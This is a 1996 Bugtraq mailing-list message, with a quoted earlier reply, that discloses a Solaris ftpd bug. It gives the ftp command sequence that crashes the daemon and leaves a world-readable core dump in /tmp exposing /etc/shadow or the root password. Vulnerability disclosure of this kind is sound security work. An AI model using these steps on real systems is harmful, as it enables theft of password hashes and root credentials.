[3485] in bugtraq
Re: ftpd bug? Was: bin/1805: Bug in ftpd
daemon@ATHENA.MIT.EDU (James Poland 6-5251)
Wed Oct 16 22:52:07 1996
Date: Wed, 16 Oct 1996 08:52:57 -0400
Reply-To: James Poland 6-5251 <poland@cam2.gsfc.nasa.gov>
From: James Poland 6-5251 <poland@cam2.gsfc.nasa.gov>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
Martin's method works for Solaris 2.5.1 as well. 'strings' on the core file
reveals the complete contents of /etc/shadow. This is not good. To reiterate,
if someone else is running an ftp session on host_a, start your own ftp
session with host_a. Then issue the commands
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv
Examine the resulting core file with the strings command.
This method does not work with Solaris 2.4.
>
> James Poland 6-5251 wrote:
> >
> > On Solaris 2.5.1, the core file contains only the user's password in
> > cleartext. How hard is it to crash someone else's ftp session?
>
> Killing from the command line doesn't seem to work, but:
>
> SunOS 5.5:
>
> logon via ftp with your regular user/password,
> ftp> cd /tmp
> ftp> user root wrongpasswd
> ftp> quote pasv
>
> voila, root password in world readable core dump under /tmp
>
> -Martin
>
> PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
> so the seem to have used the proposed fix
>
> Checking for "pw != NULL"
>
> So this proposal was simple and obvious ... and incomplete. :)
>
